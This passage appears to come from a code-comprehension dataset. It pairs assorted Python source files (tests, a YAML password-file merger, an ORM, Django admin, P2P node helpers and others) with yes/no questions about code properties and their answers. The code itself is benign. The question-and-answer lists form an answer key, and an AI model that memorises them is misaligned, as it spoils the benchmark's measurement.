                          (['-f', 'bad_file'], 1)]) # File not found error
def test_main_fails_with_bad_argument(arg_list, error_code):
    """Ensures that main() exits with the expected code on unsupported arguments."""
    runner = CliRunner()
    result = runner.invoke(main.main, arg_list)
    assert result.exit_code == error_code
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a ty... | 3 | tests/integration/test_main.py | benjaminkaplanphd/traveling-salesperson |
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from auto_scan_test import OPConvertAutoScanTest, BaseNet
from hypothesis import reproduce_failure
import hypothesis.strategies as st
import numpy as np
import unittest
import paddle
class Net(BaseNet):
    """
    simple Net: wraps paddle.numel for conversion testing.
    """

    def forward(self, inputs):
        """
        forward: return the total element count of the input tensor.
        """
        x = paddle.numel(inputs)
        return x
class TestNumelConvert(OPConvertAutoScanTest):
    """
    api: paddle.numel
    OPset version: 7, 9, 15
    """

    def sample_convert_config(self, draw):
        # Random 3-5D shape with dims in [2, 6] to exercise the converter.
        input_shape = draw(
            st.lists(
                st.integers(
                    min_value=2, max_value=6), min_size=3, max_size=5))

        dtype = draw(
            st.sampled_from(
                ["float16", "float32", "float64", "int32", "int64"]))

        # Paddle's numel lowers to the ONNX/paddle "size" op.
        config = {
            "op_names": ["size"],
            "test_data_shapes": [input_shape],
            "test_data_types": [[dtype]],
            "opset_version": [7, 9, 15],
            "input_spec_shape": [],
        }

        models = Net(config)

        return (config, models)

    def test(self):
        self.run_and_statis(max_examples=30)
if __name__ == "__main__":
unittest.main()
| [
{
"point_num": 1,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
... | 3 | tests/test_auto_scan_size.py | neonhuang/Paddle2ONNX |
#!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import sys
import yaml
def mergepwd(old, new, final, clean=False):
    """Merge two YAML password files, letting values from *old* win.

    With clean=True only keys present in *new* survive (taking the old
    value when one exists); otherwise every old key is carried over.
    The merged mapping is written to *final*.
    """
    with open(old, "r") as old_file:
        old_passwords = yaml.safe_load(old_file)

    with open(new, "r") as new_file:
        new_passwords = yaml.safe_load(new_file)

    if not isinstance(old_passwords, dict):
        print("ERROR: Old passwords file not in expected key/value format")
        sys.exit(1)

    if not isinstance(new_passwords, dict):
        print("ERROR: New passwords file not in expected key/value format")
        sys.exit(1)

    if clean:
        # Keep only the new keys, preferring an existing old value.
        for key in new_passwords:
            new_passwords[key] = old_passwords.get(key, new_passwords[key])
    else:
        # Legacy behavior: old values win and extra old keys are kept.
        new_passwords.update(old_passwords)

    with open(final, "w") as destination:
        yaml.safe_dump(new_passwords, destination, default_flow_style=False)
def main():
    """Parse the CLI arguments and merge the two password files."""
    parser = argparse.ArgumentParser()
    parser.add_argument("--old", help="old password file", required=True)
    parser.add_argument("--new", help="new password file", required=True)
    parser.add_argument("--final", help="merged password file", required=True)
    parser.add_argument("--clean",
                        help="clean (keep only new keys)",
                        action='store_true')
    args = parser.parse_args()
    mergepwd(args.old, args.new, args.final, args.clean)
if __name__ == '__main__':
main()
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"ans... | 3 | kolla_ansible/cmd/mergepwd.py | okleinschmidt/kolla-ansible |
#climber.py
#Robot Code For BlueCrew 6153
import wpilib
#Commands to make the robot climb.
class Climber:
    """Climber component: drives the robot's climbing motor.

    `climb_motor` looks like a magicbot-style injected component — the
    class annotation is replaced by a real Talon instance at robot setup.
    TODO(review): confirm against robot.py.
    """
    climb_motor = wpilib.Talon

    def climb(self):
        # Full forward power engages the climb.
        self.climb_motor.set(1)

    def stop_climb(self):
        # Zero output stops the motor.
        self.climb_motor.set(0)

    # execute() is required by the robotpy component loop.
    # DO NOT DELETE.
    def execute(self):
        pass
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
... | 3 | components/climber.py | BlueCrewRobotics/2017Robot |
#!/usr/bin/env python
"""
Memory Loss
github.com/irlrobot/memory_loss
"""
from __future__ import print_function
from random import choice, shuffle
from alexa_responses import speech_with_card
from brain_training import QUESTIONS
def handle_answer_request(player_answer, session):
    """check if the answer is right, adjust score, and continue"""
    print("=====handle_answer_request fired...")
    attributes = {}
    should_end_session = False
    print("=====answer heard was: " + player_answer)
    # The question the player was asked travels in the session attributes.
    current_question = session['attributes']['question']
    correct_answer = current_question['answer']
    # Pick the next question at random. NOTE(review): shuffling before
    # choice() is redundant — choice alone is uniform; kept as-is.
    shuffle(QUESTIONS)
    next_question = choice(QUESTIONS)
    if correct_answer == player_answer:
        answered_correctly = True
    else:
        # Record the miss for later offline analysis.
        log_wrong_answer(current_question['question'], player_answer, correct_answer)
        answered_correctly = False
    next_tts = "Next question in 3... 2... 1... " + next_question['question']
    # Carry the upcoming question forward in the session.
    attributes = {
        "question": next_question,
        "game_status": "in_progress"
    }
    if answered_correctly:
        speech_output = "Correct!" + next_tts
        card_title = "Correct!"
    else:
        speech_output = "Wrong!" + next_tts
        card_title = "Wrong!"
    card_text = "The question was:\n" + current_question['question']
    return speech_with_card(speech_output, attributes, should_end_session,
                            card_title, card_text, answered_correctly)
def log_wrong_answer(question, answer, correct_answer):
    """Record an incorrectly answered question for later offline analysis."""
    record = "[WRONG ANSWER]:" + ":".join([question, answer, correct_answer])
    print(record)
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than... | 3 | src/handle_answer_request.py | irlrobot/memory_loss |
"""
Tiny little ORM (Object Relational Mapper) for SQLite.
"""
import logging
from .db_helpers import attrs
from .manager import Manager
logging.basicConfig(
filename='simple_orm_sqlite.log',
format='%(asctime)s - %(levelname)s - %(message)s',
datefmt='%d-%b-%y %H:%M:%S',
level=logging.INFO)
class Model:
    """Base class for ORM models.

    Subclasses set `db` to a database connection; CRUD operations are
    delegated to a Manager built from that connection.
    """
    # Default connection; overridden on subclasses (or passed to manager()).
    db = None

    def delete(self, type_check=True):
        """Delete this instance via the class manager."""
        return self.__class__.manager(type_check=type_check).delete(self)

    def save(self, type_check=True):
        """Insert this instance via the class manager."""
        return self.__class__.manager(type_check=type_check).save(self)

    def update(self, type_check=True):
        """Update this instance via the class manager."""
        return self.__class__.manager(type_check=type_check).update(self)

    @property
    def public(self):
        # Dict of this instance's public attributes (see db_helpers.attrs).
        return attrs(self)

    def __repr__(self):
        return str(self.public)

    @classmethod
    def manager(cls, db=None, type_check=True):
        """Build a Manager for this model, defaulting to the class-level db."""
        return Manager(db if db else cls.db, cls, type_check)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},... | 3 | orm/orm.py | draihal/simple_orm_sqlite |
class HashableList(object):
    """
    A structure that stores a list of str()-able items,
    but can also be used as a key in a dict.

    This is not a very good general purpose data structure.
    It has a very specific use in DetailsCompatibilityChecker.
    """

    def __init__(self, delimiter=","):
        # A string mirror of the list is maintained on every add so that
        # hashing and equality run on the precomputed representation.
        self._str_representation = ""
        self._list_representation = []
        self._delimiter = delimiter

    def add(self, item):
        # Keep both representations in sync.
        self._list_representation.append(item)
        self._str_representation = "{}{}{}".format(
            self._str_representation, item, self._delimiter)

    def get_string(self):
        """Return the delimiter-joined string form (trailing delimiter kept)."""
        return self._str_representation

    def get_list(self):
        """Return a defensive copy of the stored items."""
        return self._list_representation[:]

    def __len__(self):
        return len(self._list_representation)

    def __hash__(self):
        # Hash the cheap string mirror rather than the (unhashable) list.
        return hash(self._str_representation)

    def __eq__(self, other):
        return other.get_string() == self._str_representation
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cl... | 3 | rules_default/castervoice/lib/util/hashable_list.py | MLH-Fellowship/LarynxCode |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkoutboundbot.endpoint import endpoint_data
class SaveAfterAnswerDelayPlaybackRequest(RpcRequest):
    """RPC request wrapper for OutboundBot's SaveAfterAnswerDelayPlayback API.

    SDK-generated style: each query parameter gets a getter/setter pair that
    reads from / writes to the underlying query-parameter map.
    """

    def __init__(self):
        # Product 'OutboundBot', API version '2019-12-26', action name,
        # endpoint type 'outboundbot'.
        RpcRequest.__init__(self, 'OutboundBot', '2019-12-26', 'SaveAfterAnswerDelayPlayback','outboundbot')
        self.set_method('POST')
        # Endpoint maps only exist on newer core SDK versions, hence the guards.
        if hasattr(self, "endpoint_map"):
            setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
        if hasattr(self, "endpoint_regional"):
            setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())

    def get_StrategyLevel(self):
        return self.get_query_params().get('StrategyLevel')

    def set_StrategyLevel(self,StrategyLevel):
        self.add_query_param('StrategyLevel',StrategyLevel)

    def get_EntryId(self):
        return self.get_query_params().get('EntryId')

    def set_EntryId(self,EntryId):
        self.add_query_param('EntryId',EntryId)

    def get_AfterAnswerDelayPlayback(self):
        return self.get_query_params().get('AfterAnswerDelayPlayback')

    def set_AfterAnswerDelayPlayback(self,AfterAnswerDelayPlayback):
        self.add_query_param('AfterAnswerDelayPlayback',AfterAnswerDelayPlayback)
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": tru... | 3 | aliyun-python-sdk-outboundbot/aliyunsdkoutboundbot/request/v20191226/SaveAfterAnswerDelayPlaybackRequest.py | yndu13/aliyun-openapi-python-sdk |
# -*- coding: utf-8 -*-
from unisim import DB
class DummyDB(DB):
    """No-op DB backend: satisfies the unisim DB interface without storing
    anything. Useful for running a simulation with persistence disabled."""

    def connect(self):
        # Intentionally a no-op.
        pass

    def disconnect(self):
        # Intentionally a no-op.
        pass

    def init_table(self):
        # Intentionally a no-op.
        pass

    def store(self, tick, objects):
        # Discards the per-tick object snapshot.
        pass
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": ... | 3 | simdata/hakata/script/dummy_db.py | RDC4Smart-Mobility/UniSim |
# -*- coding: utf-8 -*-
from __future__ import print_function, division, absolute_import
import numba
from numba import *
from numba import error, nodes
from numba.type_inference import module_type_inference
from numba import typesystem
if PY3:
import builtins
else:
import __builtin__ as builtins
debug = False
#debug = True
def resolve_function(func_variable):
    """Get a function object given a function name."""
    ftype = func_variable.type
    if ftype.is_builtin:
        return getattr(builtins, func_variable.name)
    if ftype.is_global:
        return ftype.value
    if ftype.is_module_attribute:
        return getattr(ftype.module, ftype.attr)
    if ftype.is_autojit_function:
        return ftype.autojit_func
    if ftype.is_jit_function:
        return ftype.jit_func
    # Unknown kind of callable: nothing to resolve.
    return None
def infer_typefunc(context, call_node, func_type, default_node):
    """Try module-registered type inferers for a call; fall back to default_node.

    If the callee is a compile-time constant, it is re-wrapped as a
    KnownValueType so the registry lookup below can match on the value.
    """
    func_var = call_node.func.variable
    if func_var.is_constant:
        func_type = typesystem.KnownValueType(func_var.constant_value)

    if (func_type.is_known_value and
            module_type_inference.is_registered(func_type.value)):
        # Try the module type inferers
        result_node = module_type_inference.resolve_call_or_none(
            context, call_node, func_type)
        if result_node:
            return result_node

    return default_node
def parse_signature(node, func_type):
    """Turn a cast-style call (e.g. ``int32(double)``) into a signature constant node."""
    arg_types = []
    for argument in node.args:
        arg_type = argument.variable.type
        if not arg_type.is_cast:
            raise error.NumbaError(argument, "Expected a numba type")
        arg_types.append(arg_type)

    signature = func_type.dst_type(*arg_types)
    return nodes.const(signature, typesystem.CastType(signature))
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written... | 3 | numba/type_inference/infer_call.py | shiquanwang/numba |
from .create_db import db
class CompoundETH(db.Model):
    # Price observations from Compound's ETH market, keyed by block number.
    __tablename__ = 'compound'
    id = db.Column('id', db.Integer, primary_key=True)
    blocknumber = db.Column('blocknumber', db.Integer)
    # presumably Unix epoch seconds — TODO confirm against the writer
    timestamp = db.Column('timestamp', db.Integer)
    price = db.Column('price', db.Float)

    def __repr__(self):
        return '{}, {}, {}'.format(self.blocknumber, self.timestamp, self.price)

class CompoundBTC(db.Model):
    # Same schema as CompoundETH, for the BTC market.
    __tablename__ = 'compoundbtc'
    id = db.Column('id', db.Integer, primary_key=True)
    blocknumber = db.Column('blocknumber', db.Integer)
    timestamp = db.Column('timestamp', db.Integer)
    price = db.Column('price', db.Float)

    def __repr__(self):
        return '{}, {}, {}'.format(self.blocknumber, self.timestamp, self.price)

class CompoundBAT(db.Model):
    # Same schema as CompoundETH, for the BAT market.
    __tablename__ = 'compoundbat'
    id = db.Column('id', db.Integer, primary_key=True)
    blocknumber = db.Column('blocknumber', db.Integer)
    timestamp = db.Column('timestamp', db.Integer)
    price = db.Column('price', db.Float)

    def __repr__(self):
        return '{}, {}, {}'.format(self.blocknumber, self.timestamp, self.price)
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false... | 3 | src/models/compound.py | Dragonfly-Capital/oracles.club.server |
from django.contrib import admin
from django.utils.translation import ugettext, ugettext_lazy as _
from ella.positions.models import Position
from ella.utils import timezone
class PositionOptions(admin.ModelAdmin):
    """Admin options for Position: adds computed title/filled/active columns."""

    def show_title(self, obj):
        """Human-readable title of the position's target, or an 'empty' marker."""
        if not obj.target:
            return '-- %s --' % ugettext('empty position')
        else:
            return u'%s [%s]' % (
                getattr(obj.target, 'title', obj.target),
                ugettext(obj.target_ct.name),
            )
    show_title.short_description = _('Title')

    def is_filled(self, obj):
        """True when the position points at a target object."""
        # Idiom: collapse the if/else returning True/False literals.
        return bool(obj.target)
    is_filled.short_description = _('Filled')
    is_filled.boolean = True

    def is_active(self, obj):
        """True when not disabled and 'now' falls inside the active window.

        An open-ended bound (None) counts as always active on that side.
        """
        if obj.disabled:
            return False
        now = timezone.now()
        active_from = not obj.active_from or obj.active_from <= now
        active_till = not obj.active_till or obj.active_till > now
        return active_from and active_till
    is_active.short_description = _('Active')
    is_active.boolean = True

    list_display = ('name', 'category', 'box_type', 'is_active', 'is_filled', 'show_title', 'disabled',)
    list_filter = ('category', 'name', 'disabled', 'active_from', 'active_till',)
    search_fields = ('box_type', 'text',)
    # suggest_fields = {'category': ('tree_path', 'title', 'slug',),}

admin.site.register(Position, PositionOptions)
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": ... | 3 | ella/positions/admin.py | petrlosa/ella |
# -*- coding: utf-8 -*-
import unittest.mock
import pytest
import pycamunda.activityinst
import pycamunda.incident
# Shared fixture value: the patched IncidentTypeCount.load below always
# returns this instance, so the test can assert on a known object.
INCIDENT_TYPE_COUNT = pycamunda.incident.IncidentTypeCount(
    incident_type=pycamunda.incident.IncidentType.failed_job,
    incident_count=1
)

@unittest.mock.patch(
    'pycamunda.incident.IncidentTypeCount.load',
    lambda _: INCIDENT_TYPE_COUNT
)
def test_transition_instance_load(my_transition_instance_json):
    """TransitionInstance.load maps every JSON field onto the instance."""
    instance = pycamunda.activityinst.TransitionInstance.load(my_transition_instance_json)

    assert instance.id_ == my_transition_instance_json['id']
    assert instance.activity_id == my_transition_instance_json['activityId']
    assert instance.activity_name == my_transition_instance_json['activityName']
    assert instance.activity_type == my_transition_instance_json['activityType']
    assert instance.process_instance_id == my_transition_instance_json['processInstanceId']
    assert instance.process_definition_id == my_transition_instance_json['processDefinitionId']
    # List-valued fields are converted to tuples by load().
    assert instance.execution_ids == tuple(my_transition_instance_json['executionId'])
    assert instance.incident_ids == tuple(my_transition_instance_json['incidentIds'])
    assert instance.incidents == (INCIDENT_TYPE_COUNT, )
def test_transition_instance_load_raises_keyerror(my_transition_instance_json):
    """Dropping any single required key makes load() raise KeyError."""
    for missing_key in my_transition_instance_json:
        incomplete = {
            key: value
            for key, value in my_transition_instance_json.items()
            if key != missing_key
        }
        with pytest.raises(KeyError):
            pycamunda.activityinst.TransitionInstance.load(incomplete)
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"ans... | 3 | tests/activityinst/test_transitioninstance.py | asyncee/pycamunda |
from CtCI_Custom_Classes.stack import Stack
class SetOfStacks:
    """A stack composed of multiple fixed-capacity sub-stacks.

    Pushes spill into a fresh sub-stack once the current one fills up;
    a sub-stack is discarded as soon as it is drained.
    """

    def __init__(self, capacity):
        self.capacity = capacity
        self.stacks = []

    def get_last_stack(self):
        """Return the active (most recent) sub-stack, or None when empty."""
        return self.stacks[-1] if self.stacks else None

    def is_empty(self):
        """True when there is no sub-stack or the active one is empty."""
        current = self.get_last_stack()
        return not current or current.is_empty()

    def pop(self):
        """Pop from the active sub-stack; returns None on an empty set."""
        current = self.get_last_stack()
        if not current:
            return None
        value = current.pop()
        # Drop the sub-stack once it has been emptied.
        if current.get_size() == 0:
            self.stacks.pop()
        return value

    def push(self, data):
        """Push onto the active sub-stack, starting a new one when full."""
        current = self.get_last_stack()
        if current and not current.is_full():
            current.push(data)
            return
        fresh = Stack(self.capacity)
        fresh.push(data)
        self.stacks.append(fresh)
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},... | 3 | CtCI_custom_classes/overflow_stack.py | enyquist/Cracking_the_Coding_Interview |
from setuptools import setup,find_packages
import os
import shutil
# Remove any stale dist folder before building, so old artifacts are not
# shipped alongside the new distribution.
if os.path.exists("dist"):
    shutil.rmtree("dist")
def readme():
    """Return the contents of README.rst for use as the long description."""
    with open('README.rst') as handle:
        contents = handle.read()
    return contents
VERSION = '1.0.53'

def write_version_py(filename='SigProfilerTopography/version.py'):
    """Write a generated version module exposing ``version``/``short_version``.

    Called at build time so the installed package can report the version
    pinned in setup.py.
    """
    # Copied from numpy setup.py
    cnt = """
# THIS FILE IS GENERATED FROM SIGPROFILERTOPOGRAPHY SETUP.PY
short_version = '%(version)s'
version = '%(version)s'
"""
    # Bugfix: use a context manager so the handle is closed even when the
    # write fails (the original leaked the handle on error).
    with open(filename, 'w') as fh:
        fh.write(cnt % {'version': VERSION,})
# Generate SigProfilerTopography/version.py so the installed package can
# report the version pinned above.
write_version_py()

setup(name="SigProfilerTopography",
      version=VERSION,
      author="Burcak Otlu",
      author_email="burcakotlu@eng.ucsd.edu",
      description="SigProfilerTopography provides topography analyses for substitutions, dinucleotides and indels for all given samples.",
      url="https://github.com/AlexandrovLab/SigProfilerTopography",
      license='UCSD',
      packages=find_packages(),
      # Runtime dependencies; version floors as pinned by upstream.
      install_requires=[
          "SigProfilerMatrixGenerator>=1.1.27",
          "SigProfilerSimulator>=1.1.2",
          "XlsxWriter>=1.3.7",
          "pandas>=1.1.5",
          "numpy>=1.20.1",
          "matplotlib>=2.2.2",
          "scipy>=1.1.0",
          "statsmodels>=0.9.0",
          "fastrand>=1.2",
          "psutil>=5.6.3"],
      include_package_data=True,
      zip_safe=False)
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": tru... | 3 | setup.py | AlexandrovLab/SigProfilerTopography |
# Generic memory-mapped peripheral interface.
#
# Luz micro-controller simulator
# Eli Bendersky (C) 2008-2010
#
class Peripheral(object):
    """ An abstract memory-mapped peripheral interface.

    Memory-mapped peripherals are accessed through memory
    reads and writes.
    The address given to reads and writes is relative to the
    peripheral's memory map.
    Width is 1, 2, 4 for byte, halfword and word accesses.
    """
    def read_mem(self, addr, width):
        """Read *width* bytes at *addr* (relative to this peripheral's map)."""
        raise NotImplementedError()

    def write_mem(self, addr, width, data):
        """Write *data* of *width* bytes at *addr* (relative offset)."""
        raise NotImplementedError()
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than cla... | 3 | luz_asm_sim/lib/simlib/peripheral/peripheral.py | eliben/luz-cpu |
import os
import pandas as pd
from .utils import load_setting
class Divider(object):
    """Splits a DataFrame into Excel workbooks, one sheet per group value."""

    def __init__(self, df, files, base):
        self.data = df
        self.files = files      # {workbook filename: iterable of group names}
        self.base = base        # column name used for grouping
        self.writers = dict()

    def _setup_writer(self, outdir):
        """Create one ExcelWriter per configured workbook under *outdir*."""
        assert self.files
        os.makedirs(outdir, exist_ok=True)
        for filename in self.files:
            self.writers[filename] = pd.ExcelWriter(
                os.path.join(outdir, filename), engine='xlsxwriter')

    def save(self, outdir):
        """Write each group of rows as a sheet in its configured workbook."""
        self._setup_writer(outdir)
        for classname, member in self.data.groupby(self.base):
            member = member.drop(self.base, axis=1)
            filename = next(
                (name for name, classnames in self.files.items()
                 if classname in classnames),
                None)
            if filename is None:
                # No workbook is configured for this group value.
                raise RuntimeError
            member.to_excel(self.writers[filename], classname, index=False)
        for writer in self.writers.values():
            writer.save()
def divider(df):
    """Split *df* according to the 'divider' section of the settings file."""
    section = load_setting()['divider']
    output_dir = load_setting()['system']['tmpdir']
    Divider(df, section["file"], section["base"]).save(output_dir)
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer"... | 3 | murasame/divider.py | amaotone/caruta-contest-manager |
import pytest
from service.common.login import LoginPage
"""
function:每一个函数或方法都会调用
class:每一个类调用一次,一个类可以有多个方法
module:每一个.py文件调用一次,该文件内又有多个function和class
session:是多个文件调用一次,可以跨.py文件调用,每个.py文件就是module
"""
@pytest.fixture()
def session(page):
return LoginPage(page).login(
username='18886885',
password='Admin@123',
base_url='http://172.23.16.13:8888/oauth/login',
)
def pytest_sessionstart():
...
def pytest_sessionfinish(session):
...
@pytest.hookimpl(hookwrapper=True)
def pytest_collection():
yield
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"ans... | 3 | conftest.py | aquichita/awesome-pytest-playwright |
from __future__ import annotations
from . import Endpoint
import web_framework_v2.http.http_request as http_request
class EndpointMap:
    """Maps (HTTP method, route) pairs to Endpoint objects."""

    def __init__(self):
        # {HttpMethod: {route_str: Endpoint}}
        self._method_routes_map = {}

    def get_endpoint(self, request: http_request.HttpRequest) -> tuple[Endpoint | None, str | None] | None:
        """Find the endpoint serving *request*.

        An exact URL match is tried first; otherwise every route registered
        for the method is pattern-matched against the URL. Returns
        (endpoint, path-variable map) or (None, None) when nothing matches
        or the headers don't match.
        """
        routes_for_method = self._method_routes_map.get(request.method)
        if routes_for_method is None:
            return None, None

        exact_match = routes_for_method.get(request.url)
        if exact_match is not None:
            if not exact_match.matches_headers(request):
                return None, None
            return exact_match, None

        for candidate in routes_for_method.values():
            url_matches, variable_map = candidate.matches_url(request.url)
            if url_matches and candidate.matches_headers(request):
                return candidate, variable_map

        return None, None

    def add_route(self, route: Endpoint):
        """Register *route*; refuses to overwrite an existing registration."""
        existing = self._method_routes_map.get(route.method(), {}).get(route.route(), None)
        assert existing is None, \
            "Route already exists! Cannot add existing route!"
        bucket = self._method_routes_map.setdefault(route.method(), {})
        bucket[route.route()] = route

    def __str__(self):
        return str(self._method_routes_map)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},... | 3 | web_framework_v2/route/endpoint_map.py | Heknon/web_framework_v2 |
import numpy as np
from typing import Union, Tuple, Dict
class Agent(object):
    """Abstract RL agent interface: act, learn from a transition, reset."""

    def get_action(self, obs:np.ndarray, stochastic:bool=True)-> Tuple[Union[int, np.ndarray, Dict], float]:
        """Return (action, log-probability of that action under the policy)."""
        raise NotImplementedError

    def update(self, obs:np.ndarray, act:Union[int, np.ndarray, Dict], blogp:float, reward:float, obs_next:np.ndarray, terminal:bool)->Union[np.ndarray, None]:
        """Consume one transition; may return learner diagnostics or None."""
        raise NotImplementedError

    def new_episode(self):
        """Reset any per-episode internal state."""
        raise NotImplementedError
class FixedAgent(Agent):
def __init__(self, policy):
self.policy = policy
def get_action(self, obs:np.ndarray, stochastic:bool=True)-> Tuple[Union[int, np.ndarray, Dict], float]:
return self.policy.get_action(obs, stochastic)
def update(self, obs:np.ndarray, act:Union[int, np.ndarray, Dict], blogp:float, reward:float, obs_next:np.ndarray, terminal:bool)->Union[np.ndarray, None]:
return None
def new_episode(self):
pass | [
{
"point_num": 1,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true... | 3 | rllib/agents/agent.py | ScottJordan/python-rllib |
from node.myownp2pn import MyOwnPeer2PeerNode
from lib.settings import the_settings
def ndstart(port):
    """Start a P2P node listening on *port* on all interfaces."""
    node = MyOwnPeer2PeerNode("",port)
    # Mirror the application-wide debug setting onto the node.
    node.debug = the_settings().debug_mode()
    node.start()

def ndstop():
    """Stop the running main node."""
    MyOwnPeer2PeerNode.main_node.stop()

def ndconnect(ip,port):
    """Connect the main node to a peer at ip:port."""
    MyOwnPeer2PeerNode.main_node.connect_with_node(ip, port)
def ndconnectmix_blockchain_network():
MyOwnPeer2PeerNode.main_node.connectionfrommix_blockchain_network() | [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (exclu... | 3 | func/node_connection.py | cyberhacktowelie/POW-Blockchain-Network-Infrustructure |
import json
import re
import requests
import dbt.exceptions
import dbt.semver
PYPI_VERSION_URL = 'https://pypi.org/pypi/dbt/json'
def get_latest_version():
    """Return the newest dbt version on PyPI, or None if it can't be fetched."""
    try:
        # Bugfix: bound the request so a wedged network call can't hang the
        # CLI; requests.Timeout is a RequestException, so it's caught below.
        resp = requests.get(PYPI_VERSION_URL, timeout=5)
        data = resp.json()
        version_string = data['info']['version']
    except (json.JSONDecodeError, KeyError, requests.RequestException):
        # Any network/parse failure means "latest version unknown".
        return None
    return dbt.semver.VersionSpecifier.from_version_string(version_string)
def get_installed_version():
    """Return the locally installed dbt version (parsed from __version__)."""
    return dbt.semver.VersionSpecifier.from_version_string(__version__)
def get_version_information():
    """Build the human-readable 'installed vs latest' version report."""
    installed = get_installed_version()
    latest = get_latest_version()

    installed_s = installed.to_version_string(skip_matcher=True)
    latest_s = ('unknown' if latest is None
                else latest.to_version_string(skip_matcher=True))

    version_msg = ("installed version: {}\n"
